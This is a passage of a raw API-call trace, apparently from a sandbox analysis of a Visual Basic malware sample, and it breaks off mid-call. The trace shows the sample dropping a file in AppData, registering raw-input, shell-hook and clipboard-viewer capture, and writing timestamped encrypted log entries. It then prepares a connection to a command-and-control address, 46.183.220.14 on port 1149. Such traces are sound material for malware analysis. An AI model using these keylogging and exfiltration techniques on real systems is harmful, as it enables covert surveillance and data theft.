returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" [0202.682] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned 73 [0202.682] lstrcpyA (in: lpString1=0x3db4a8, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" [0202.682] lstrcpyA (in: lpString1=0x3db500, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" [0202.682] SetLastError (dwErrCode=0x0) [0202.682] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x3db390, lpFilePart=0x30f540 | out: lpBuffer="", lpFilePart=0x30f540*="\x8b\x06\x5e\xc3\x55\x8b\xec\x51\x56\x8b\xf1\x33\xc9\x57\x8b\x46\x04\x3b\xc1\x74\x25\x39\x4e\x08\x75\x20\x8d\x55\xfc\x51\x52\x51\x51\x50\x8b\xce\xe8\x9b\x69\xfb\xff\xff\x75\xfc\xff\x36\xff\x15\x7c\x12\x94\x72\x8b\x06\x5f\x5e\xc9\xc3\xbf\xf1\x99\x95\x72\x83\xc9\xff\x33\xc0\xf2\xae\xf7\xd1\x2b\xf9\xb8\x7c\x07\xa5\x72\x8b\xd1\x8b\xf7\x8b\xf8\xc1\xe9\x02\xf3\xa5\x8b\xca\x83\xe1\x03\xf3\xa4\xeb\xd3\x55\x8b\xec\x51\x51\x56\x8b\xf1\x57\x8b\x46\x04\x85\xc0\x74\x3e\x83\x7e\x08") returned 0x0 [0202.682] GetFullPathNameA (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", nBufferLength=0x103, lpBuffer=0x3db390, lpFilePart=0x30f540 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", lpFilePart=0x30f540*="ut") returned 0x49 [0202.682] CreateFileA (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441\\ut"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0202.683] GetLastError () returned 0x0 [0202.683] lstrcpynA (in: lpString1=0x30f44c, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut", iMaxLength=260 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" [0202.683] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned 73 [0202.683] lstrcpyA (in: lpString1=0x3db558, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\ut" [0202.683] GetFileType (hFile=0x170) returned 0x1 [0202.683] _hwrite (in: hFile=0x170, lpBuffer=0x30f614*, lBytes=14 | out: lpBuffer=0x30f614*) returned 14 [0202.684] _hwrite (in: hFile=0x170, lpBuffer=0x6e1798*, lBytes=49192 | out: lpBuffer=0x6e1798*) returned 49192 [0202.685] _lclose (hFile=0x170) returned 0x0 [0202.686] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f6b0 | out: ppsaOut=0x30f6b0) returned 0x0 [0202.687] GetUserDefaultLCID () returned 0x409 [0202.687] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0202.687] SysStringLen (param_1="User32.dll") returned 0xb [0202.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="User32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0202.687] SysStringLen (param_1="User32.dll") returned 0xb [0202.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="User32.dll", cchWideChar=12, lpMultiByteStr=0x6d20c4, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User32.dll", lpUsedDefaultChar=0x0) returned 12 [0202.687] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0202.687] GetUserDefaultLCID () returned 0x409 [0202.687] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0202.687] SysStringLen (param_1="CreateWindowExW") returned 0x10 [0202.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateWindowExW", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0202.687] SysStringLen (param_1="CreateWindowExW") returned 0x10 [0202.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateWindowExW", cchWideChar=17, lpMultiByteStr=0x6d254c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateWindowExW", lpUsedDefaultChar=0x0) returned 17 [0202.687] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0202.687] SetErrorMode (uMode=0x8001) returned 0x8001 [0202.688] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77820000 [0202.688] SetErrorMode (uMode=0x8001) returned 0x8001 [0202.688] GetProcAddress (hModule=0x77820000, lpProcName="CreateWindowExW") returned 0x77838a29 [0202.688] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0202.688] SafeArrayDestroyDescriptor (psa=0x6d71a8) returned 0x0 [0202.688] CreateWindowExW (dwExStyle=0x0, lpClassName="EDIT", lpWindowName=0x0, dwStyle=0xc4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x50276 [0202.727] SafeArrayDestroyDescriptor (psa=0x6d7178) returned 0x0 [0202.727] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0202.727] CoCreateInstanceEx (in: Clsid=0x4128f8*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), punkOuter=0x0, dwClsCtx=0x5, pServerInfo=0x0, dwCount=0x4, pResults=0x30f514 | out: pResults=((pIID=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pItf=0x32890, hr=0x0), (pIID=0x412908*(Data1=0x2a0b9d10, Data2=0x4b87, Data3=0x11d3, Data4=([0]=0xa9, [1]=0x7a, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0x36, [6]=0x5c, [7]=0x9f)), pItf=0x32890, hr=0x0), (pIID=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), pItf=0x0, hr=0x80004002), (pIID=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), pItf=0x0, hr=0x80004002))) returned 0x80012 [0204.946] IUnknown:Release (This=0x32890) returned 0x1 [0204.946] FileSystemObject:IFileSystem:OpenTextFile (in: This=0x32890, FileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441", IOMode=8, Create=1, Format=0, ppts=0x30f6b8 | out: ppts=0x30f6b8*=0x3d458) returned 0x0 [0204.950] FileSystemObject:IUnknown:QueryInterface (in: This=0x3d458, riid=0x412938*(Data1=0x53bad8c1, Data2=0xe718, Data3=0x11cf, Data4=([0]=0x89, [1]=0x3d, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), ppvObject=0x30f5b4 | out: ppvObject=0x30f5b4*=0x3d458) returned 0x0 [0204.950] FileSystemObject:IUnknown:Release (This=0x3d458) returned 0x1 [0204.950] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.950] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0204.950] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.950] GetProcAddress (hModule=0x77820000, lpProcName="RegisterRawInputDevices") returned 0x778988eb [0204.950] RegisterRawInputDevices (pRawInputDevices=0x30f5e0, uiNumDevices=0x1, cbSize=0xc) returned 1 [0204.950] GetLastError () returned 0x0 [0204.950] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f6b0 | out: ppsaOut=0x30f6b0) returned 0x0 [0204.951] GetUserDefaultLCID () returned 0x409 [0204.951] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0204.951] SysStringLen (param_1="User32.dll") returned 0xb [0204.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="User32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0204.951] SysStringLen (param_1="User32.dll") returned 0xb [0204.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="User32.dll", cchWideChar=12, lpMultiByteStr=0x6d25ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User32.dll", lpUsedDefaultChar=0x0) returned 12 [0204.951] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0204.951] GetUserDefaultLCID () returned 0x409 [0204.951] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0204.951] SysStringLen (param_1="RegisterWindowMessageW") returned 0x17 [0204.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegisterWindowMessageW", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0204.951] SysStringLen (param_1="RegisterWindowMessageW") returned 0x17 [0204.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RegisterWindowMessageW", cchWideChar=24, lpMultiByteStr=0x6d263c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RegisterWindowMessageW", lpUsedDefaultChar=0x0) returned 24 [0204.951] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0204.952] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.952] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77820000 [0204.952] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.952] GetProcAddress (hModule=0x77820000, lpProcName="RegisterWindowMessageW") returned 0x77839ebd [0204.952] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0204.952] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0204.952] RegisterClipboardFormatW (lpszFormat="SHELLHOOK") returned 0xc02b [0204.952] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0204.952] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.952] LoadLibraryA (lpLibFileName="Shell32") returned 0x76b00000 [0204.952] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.953] GetProcAddress (hModule=0x76b00000, lpProcName=0xb5) returned 0x76b03b3a [0204.953] RegisterShellHook () returned 0x1 [0204.953] GetLastError () returned 0x5 [0204.953] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f6b0 | out: ppsaOut=0x30f6b0) returned 0x0 [0204.953] GetUserDefaultLCID () returned 0x409 [0204.953] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0204.953] SysStringLen (param_1="user32.dll") returned 0xb [0204.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0204.962] SysStringLen (param_1="user32.dll") returned 0xb [0204.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=12, lpMultiByteStr=0x6d254c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="user32.dll", lpUsedDefaultChar=0x0) returned 12 [0204.962] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0204.962] GetUserDefaultLCID () returned 0x409 [0204.962] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0204.962] SysStringLen (param_1="SetClipboardViewer") returned 0x13 [0204.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetClipboardViewer", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0204.962] SysStringLen (param_1="SetClipboardViewer") returned 0x13 [0204.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetClipboardViewer", cchWideChar=20, lpMultiByteStr=0x6d2614, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetClipboardViewer", lpUsedDefaultChar=0x0) returned 20 [0204.962] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0204.963] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.963] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0204.963] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.963] GetProcAddress (hModule=0x77820000, lpProcName="SetClipboardViewer") returned 0x7784c4b6 [0204.963] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0204.963] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0204.963] SetClipboardViewer (hWndNewViewer=0x50276) returned 0x0 [0204.973] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0204.973] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f6b0 | out: ppsaOut=0x30f6b0) returned 0x0 [0204.974] GetUserDefaultLCID () returned 0x409 [0204.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0204.974] SysStringLen (param_1="user32.dll") returned 0xb [0204.974] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0204.974] SysStringLen (param_1="user32.dll") returned 0xb [0204.974] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=12, lpMultiByteStr=0x6d263c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="user32.dll", lpUsedDefaultChar=0x0) returned 12 [0204.974] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0204.974] GetUserDefaultLCID () returned 0x409 [0204.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3b8, cchData=6 | out: lpLCData="1252") returned 5 [0204.974] SysStringLen (param_1="SetWindowLongA") returned 0xf [0204.974] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowLongA", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0204.974] SysStringLen (param_1="SetWindowLongA") returned 0xf [0204.974] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowLongA", cchWideChar=16, lpMultiByteStr=0x6d20c4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetWindowLongA", lpUsedDefaultChar=0x0) returned 16 [0204.974] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3c8 | out: ppsaOut=0x30f3c8) returned 0x0 [0204.974] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.974] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0204.975] SetErrorMode (uMode=0x8001) returned 0x8001 [0204.975] GetProcAddress (hModule=0x77820000, lpProcName="SetWindowLongA") returned 0x77846110 [0204.975] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0204.975] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0204.975] SetWindowLongA (hWnd=0x50276, nIndex=-4, dwNewLong=4211776) returned -64913 [0204.975] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0204.975] GetLocalTime (in: lpSystemTime=0x30f49c | out: lpSystemTime=0x30f49c*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0xe, wMilliseconds=0x160)) [0204.975] VarDateFromUdate (in: pudateIn=0x30f4c0, dwFlags=0x0, pdateOut=0x30f49c | out: pdateOut=0x30f49c) returned 0x0 [0204.981] VarFormat (in: pvarIn=0x30f520, pstrFormat="mm/dd/yy", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f4e4 | out: pbstrOut=0x30f4e4*="11/05/18") returned 0x0 [0205.036] GetLocalTime (in: lpSystemTime=0x30f49c | out: lpSystemTime=0x30f49c*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0xe, wMilliseconds=0x19e)) [0205.036] VarDateFromUdate (in: pudateIn=0x30f4c0, dwFlags=0x0, pdateOut=0x30f49c | out: pdateOut=0x30f49c) returned 0x0 [0205.037] VarFormat (in: pvarIn=0x30f520, pstrFormat="hh:mm:ss", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f4e0 | out: pbstrOut=0x30f4e0*="09:30:14") returned 0x0 [0205.038] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.038] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0205.038] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.038] GetProcAddress (hModule=0x77820000, lpProcName="SendMessageA") returned 0x7784612e [0205.038] SendMessageA (hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0205.038] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.038] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0205.039] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.039] GetProcAddress (hModule=0x77820000, lpProcName="CallWindowProcA") returned 0x7784792f [0205.039] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0205.039] GetLastError () returned 0x578 [0205.039] GetLastError () returned 0x578 [0205.039] GetLocalTime (in: lpSystemTime=0x30f3d8 | out: lpSystemTime=0x30f3d8*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0xe, wMilliseconds=0x19e)) [0205.040] VarDateFromUdate (in: pudateIn=0x30f3fc, dwFlags=0x0, pdateOut=0x30f3d8 | out: pdateOut=0x30f3d8) returned 0x0 [0205.040] VarFormat (in: pvarIn=0x30f45c, pstrFormat="mm/dd/yy", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f420 | out: pbstrOut=0x30f420*="11/05/18") returned 0x0 [0205.040] GetLocalTime (in: lpSystemTime=0x30f3d8 | out: lpSystemTime=0x30f3d8*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0xe, wMilliseconds=0x19e)) [0205.040] VarDateFromUdate (in: pudateIn=0x30f3fc, dwFlags=0x0, pdateOut=0x30f3d8 | out: pdateOut=0x30f3d8) returned 0x0 [0205.040] VarFormat (in: pvarIn=0x30f45c, pstrFormat="hh:mm:ss", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f41c | out: pbstrOut=0x30f41c*="09:30:14") returned 0x0 [0205.040] VarBstrCmp (bstrLeft="11/05/18", bstrRight="11/05/18", lcid=0x0, dwFlags=0x30001) returned 0x1 [0205.041] GetUserDefaultLCID () returned 0x409 [0205.041] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3ac, cchData=6 | out: lpLCData="1252") returned 5 [0205.041] SysStringLen (param_1="GetForegroundWindow") returned 0x13 [0205.041] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetForegroundWindow", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0205.041] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3bc | out: ppsaOut=0x30f3bc) returned 0x0 [0205.041] GetUserDefaultLCID () returned 0x409 [0205.041] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3ac, cchData=6 | out: lpLCData="1252") returned 5 [0205.041] SysStringLen (param_1="\x5b\x2a\xb5\x31\x31\x2f\x30\x35\x2f\x31\x38\xb5\x2a\x30\x39\x3a\x33\x30\x3a\x31\x34\x2a\xb5\x5d\x0d\x0a") returned 0x1a [0205.042] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\x5b\x2a\xb5\x31\x31\x2f\x30\x35\x2f\x31\x38\xb5\x2a\x30\x39\x3a\x33\x30\x3a\x31\x34\x2a\xb5\x5d\x0d\x0a", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0205.042] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f3bc | out: ppsaOut=0x30f3bc) returned 0x0 [0205.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0205.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x6d20c4, cchWideChar=7 | out: lpWideCharStr="Source") returned 7 [0205.042] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x30f3a4) [0205.043] RtlUnwind (TargetFrame=0x30f4c8, TargetIp=0x72a43bb5, ExceptionRecord=0x0, ReturnValue=0x0) [0205.043] GetUserDefaultLCID () returned 0x409 [0205.043] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f3ac, cchData=6 | out: lpLCData="1252") returned 5 [0205.044] SysStringByteLen (bstr="\x92b9\x7401\xbce7\xf2bb\x2203\xbd8a\x42bc\x7adc\xbac0\x457d\xcbfc\x72b7\xe8e4") returned 0x1a [0205.044] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6d2614, cbMultiByte=26, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0205.044] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0205.044] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0205.044] ITextStream:Write (This=0x3d458, Text="\xb9\x2019\x01\x74\xe7\xbc\xbb\xf2\x03\x22\x160\xbd\xbc\x42\xdc\x7a\xc0\xba\x7d\x45\xfc\xcb\xb7\x72\xe4\xe8\x0d\x0a") returned 0x0 [0205.046] GetUserDefaultLCID () returned 0x409 [0205.046] VarI4FromStr (in: strIn="1149", lcid=0x409, dwFlags=0x0, plOut=0x30f69c | out: plOut=0x30f69c) returned 0x0 [0205.046] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.046] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76450000 [0205.046] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.047] GetProcAddress (hModule=0x76450000, lpProcName="htons") returned 0x76452d8b [0205.047] htons (hostshort=0x47d) returned 0x7d04 [0205.047] GetLastError () returned 0x0 [0205.047] SysStringLen (param_1="46.183.220.14") returned 0xd [0205.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="46.183.220.14", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.047] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76450000 [0205.047] SetErrorMode (uMode=0x8001) returned 0x8001 [0205.048] GetProcAddress (hModule=0x76450000, lpProcName="inet_addr") returned 0x7645311b [0205.048] inet_addr (cp="46.183.220.14") returned 0xedcb72e [0205.048] GetLastError () returned 0x0 [0205.048] SysStringByteLen (bstr="㘴ㄮ㌸㈮〲ㄮ4") returned 0xd [0205.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20c4, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0205.048] IMalloc:Alloc (This=0x75e366bc, cb=0xc) returned 0x6e1248 [0205.048] GetModuleFileNameW (in: hModule=0x72940000, lpFilename=0x72a50bf8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0205.048] LoadTypeLibEx (in: szFile="C:\\Windows\\system32\\MSVBVM60.DLL", regkind=0x2, 